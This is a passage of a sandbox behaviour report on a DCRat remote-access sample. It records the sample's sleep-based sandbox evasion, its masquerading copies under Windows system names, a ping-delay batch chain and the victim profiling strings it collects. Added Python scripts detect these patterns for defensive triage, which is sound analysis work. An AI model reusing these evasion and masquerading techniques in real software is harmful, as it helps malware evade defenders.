Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -599328s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -599218s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -599109s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -598999s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -598890s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 4296 Thread sleep time: -3600000s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -598781s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -598671s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -598562s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -598453s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -598343s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -598234s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -598125s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -598014s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -597906s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -597796s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -597686s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -597578s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -597468s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -597358s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -597250s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -597140s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -597031s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -596921s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -596812s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -596586s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -596484s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -596374s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -596256s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -596125s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -596012s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -595905s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -595796s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -595684s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -595578s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -595468s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -595359s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -595250s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -595140s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -595031s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -594921s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -594812s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -594703s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -594583s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe TID: 7964 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe TID: 5816 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe TID: 2736 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe TID: 2200 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe TID: 2688 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\StartMenuExperienceHost.exe TID: 2800 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\StartMenuExperienceHost.exe TID: 2692 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\StartMenuExperienceHost.exe TID: 4020 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
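The sleep records above show three delay mechanisms stacked together: threads parked at 922337203685477 ms (2^63 hundred-nanosecond ticks, the way an effectively infinite relative wait is rendered, so the thread never wakes on its own), a 10-minute wait on TID 5552 that is cut into slices of roughly 100 ms with the remaining time recomputed each round (600000, 599873, 599765, ...; a sandbox that fast-forwards Sleep() still has to let the real interval pass), and `ping -n 10 localhost` run from the dropped batch file as a delay that involves no Sleep() call at all. The script below is an added example written for this page, not part of the Joe Sandbox report or of the DCRat sample. It parses a verbatim subset of the report's own lines and flags those three patterns; the regular expressions, the thresholds, and the reading of the sleep numbers as milliseconds (the report's "s" suffix is its rendering of a negative NT due time, and the values match the "delay time" records) are the editor's assumptions.

```python
"""Sleep-evasion triage over sandbox behaviour lines (added example, see the lead-in)."""
import re
from collections import defaultdict, namedtuple

TIMESPAN_MAX_MS = 922_337_203_685_477   # 2**63 hundred-nanosecond ticks in ms: an effectively infinite wait
MAX_SLICE_STEP_MS = 1_000               # assumption: countdown slices shrink by less than 1 s per round
MIN_COUNTDOWN_LEN = 5                   # assumption: five shrinking slices before we call it a loop

# Assumption: the number is milliseconds; the "s" suffix is the report's rendering of a negative NT due time.
SLEEP_RE = re.compile(r"^Source: (?P<image>.+?) TID: (?P<tid>\d+) Thread sleep time: -(?P<ms>\d+)s")
PING_RE = re.compile(r"Process created: (?P<exe>\S*PING\.EXE) ping (?P<args>.+?)(?: Jump to behavior)?$", re.IGNORECASE)

Sleep = namedtuple("Sleep", "image tid ms")


def parse_sleeps(lines):
    """Return one Sleep(image, tid, ms) per 'Thread sleep time' record, in report order."""
    out = []
    for line in lines:
        m = SLEEP_RE.match(line.strip())
        if m:
            out.append(Sleep(m["image"], int(m["tid"]), int(m["ms"])))
    return out


def find_parked_threads(sleeps):
    """Threads that asked for an infinite wait: they never wake on their own."""
    return sorted({(s.image, s.tid) for s in sleeps if s.ms >= TIMESPAN_MAX_MS})


def find_countdown_runs(sleeps, max_step=MAX_SLICE_STEP_MS, min_len=MIN_COUNTDOWN_LEN):
    """Per thread, maximal runs in which each sleep is a little shorter than the previous one.
    Returns (image, tid, first_ms, last_ms, slice_count) per run; records of other threads
    interleaved in the report (here TID 4296's one-hour sleep) do not break a run.
    """
    per_thread = defaultdict(list)
    for s in sleeps:
        per_thread[(s.image, s.tid)].append(s.ms)
    runs = []
    for (image, tid), values in per_thread.items():
        run = [values[0]]
        for prev, cur in zip(values, values[1:]):
            if 0 < prev - cur <= max_step:
                run.append(cur)
                continue
            if len(run) >= min_len:
                runs.append((image, tid, run[0], run[-1], len(run)))
            run = [cur]
        if len(run) >= min_len:
            runs.append((image, tid, run[0], run[-1], len(run)))
    return runs


def find_ping_delays(lines):
    """`ping -n N <self>` as a delay: N echoes one second apart, so about N-1 s without a Sleep() call."""
    found = []
    for line in lines:
        m = PING_RE.search(line)
        if not m:
            continue
        args = m["args"].split()
        count = 1
        if "-n" in args:
            n = args[args.index("-n") + 1:][:1]
            count = int(n[0]) if n and n[0].isdigit() else 1
        target = args[-1] if args else ""
        if target.lower() in {"localhost", "127.0.0.1", "::1"}:
            found.append((target, count, max(count - 1, 0)))
    return found


def triage(lines):
    """Run all three checks over raw report lines and return them keyed by finding type."""
    sleeps = parse_sleeps(lines)
    return {
        "parked_threads": find_parked_threads(sleeps),
        "countdown_runs": find_countdown_runs(sleeps),
        "ping_delays": find_ping_delays(lines),
    }


# A subset of the report's own lines, copied verbatim and in report order.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe TID: 7580 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 7764 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -599873s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -599765s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -599546s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -599437s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 4296 Thread sleep time: -3600000s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -599328s >= -30000s Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
""".strip().splitlines()
```

On the sample above `triage(SAMPLE_LINES)` reports TID 7580 of 0JLWNg4Sz1.exe as parked, one countdown run of seven slices from 600000 down to 599328 ms on TID 5552, and one ping delay of about nine seconds. The countdown check is the one worth keeping in a triage pipeline: a single long sleep is cheap to skip, but a thread that re-derives "time left" from the wall clock on every slice only yields to a sandbox that also patches the clock.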
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\StartMenuExperienceHost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\StartMenuExperienceHost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\StartMenuExperienceHost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599873 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599218 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598999 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 3600000 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598343 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598125 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598014 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597906 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597796 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597686 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597578 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597468 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597358 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597250 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597140 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597031 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596921 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596812 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596586 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596484 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596374 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596256 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596125 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596012 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595905 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595796 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595684 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595578 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595468 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595359 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595250 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595140 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595031 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 594921 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 594812 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 594703 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 594583 Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: 0JLWNg4Sz1.exe, 00000000.00000002.1711950301.000000001C637000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4177598687.000000001AF90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process token adjusted: Debug Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Process token adjusted: Debug
Source: C:\Recovery\StartMenuExperienceHost.exe Process token adjusted: Debug
Source: C:\Recovery\StartMenuExperienceHost.exe Process token adjusted: Debug
Source: C:\Recovery\StartMenuExperienceHost.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Recovery\StartMenuExperienceHost.exe "C:\Recovery\StartMenuExperienceHost.exe"
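The batch file chain ends by launching C:\Recovery\StartMenuExperienceHost.exe, and the report's other copies sit at C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe and as PE images with a .log extension on the desktop. Two of the report's signatures (the system-file execution location anomaly and the non-matching file extension) reduce to rules that an endpoint hunt or a triage script can apply to a path and the first bytes of a file. The script below is an added example written for this page, not part of the Joe Sandbox report or of the sample. The expected-location table is an assumption taken from a Windows 10 install and must be extended for your own estate; the MZ header bytes are constructed, because the report states that the .log files are PE images but does not print their contents.

```python
"""Location and extension checks for the dropped files in the report (added example, see the lead-in)."""
import ntpath

# Directories in which Windows itself ships each binary (assumption from a Windows 10 install;
# a name not listed here is simply not judged, so the check never guesses).
EXPECTED_DIRS = {
    "smartscreen.exe": [r"C:\Windows\System32"],
    "startmenuexperiencehost.exe": [
        r"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy",
    ],
    "svchost.exe": [r"C:\Windows\System32", r"C:\Windows\SysWOW64"],
    "explorer.exe": [r"C:\Windows"],
}

# Extensions under which a PE image is expected; anything else with an MZ header is suspicious.
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl", ".drv", ".efi", ".mui"}


def _same_dir(directory, expected):
    """Case-insensitive, slash-insensitive directory comparison that also works off-Windows."""
    return ntpath.normcase(directory) == ntpath.normcase(expected)


def masquerading_system_name(path):
    """True if the file name is a tracked Windows binary but the directory is not one Windows uses for it."""
    directory, name = ntpath.split(path)
    expected = EXPECTED_DIRS.get(name.lower())
    if expected is None:
        return False
    return not any(_same_dir(directory, d) for d in expected)


def extension_mismatch(path, head):
    """True if the content starts with a PE 'MZ' header but the extension does not say executable."""
    ext = ntpath.splitext(path)[1].lower()
    return head[:2] == b"MZ" and ext not in PE_EXTENSIONS


def triage(entries):
    """entries: iterable of (path, first_bytes_or_None). Returns (path, finding) pairs."""
    findings = []
    for path, head in entries:
        if masquerading_system_name(path):
            findings.append((path, "system binary name outside its Windows location"))
        if head is not None and extension_mismatch(path, head):
            findings.append((path, "PE image with a non-executable extension"))
    return findings


# Paths taken from the report; the header bytes are constructed for the example.
REPORT_ENTRIES = [
    (r"C:\Recovery\StartMenuExperienceHost.exe", b"MZ\x90\x00"),
    (r"C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe", b"MZ\x90\x00"),
    (r"C:\Users\user\Desktop\KjTCumlu.log", b"MZ\x90\x00"),
    (r"C:\Users\user\Desktop\ALzNWdSZ.log", b"MZ\x90\x00"),
    (r"C:\Windows\System32\smartscreen.exe", b"MZ\x90\x00"),  # the genuine location, as a control
]

if __name__ == "__main__":
    for path, finding in triage(REPORT_ENTRIES):
        print(f"{finding}: {path}")
```

Run over the report's paths this yields four findings and leaves the genuine C:\Windows\System32\smartscreen.exe alone. Matching is on the full directory rather than a prefix on purpose: C:\Windows\System32\Tasks or a user-writable subdirectory under C:\Windows must not inherit the trust of the parent.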
Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerH
Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000029B6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ,"Unknown (Unknown)","Unknown (Unknown)","Program Manager","173.254.250.78","US / United States of America","Texas / Dallas"," /
Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: [{},"5.0.1",5,1,"","user","965543","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Users\\All Users\\Microsoft OneDrive\\setup","Unknown (Unknown)","Unknown (Unknown)","Program Manager","173.254.250.78","US / United States of America","Texas / Dallas"," / "]
Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager`
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Queries volume information: C:\Users\user\Desktop\0JLWNg4Sz1.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Queries volume information: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Queries volume information: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Queries volume information: C:\Users\user\Desktop\0JLWNg4Sz1.exe VolumeInformation
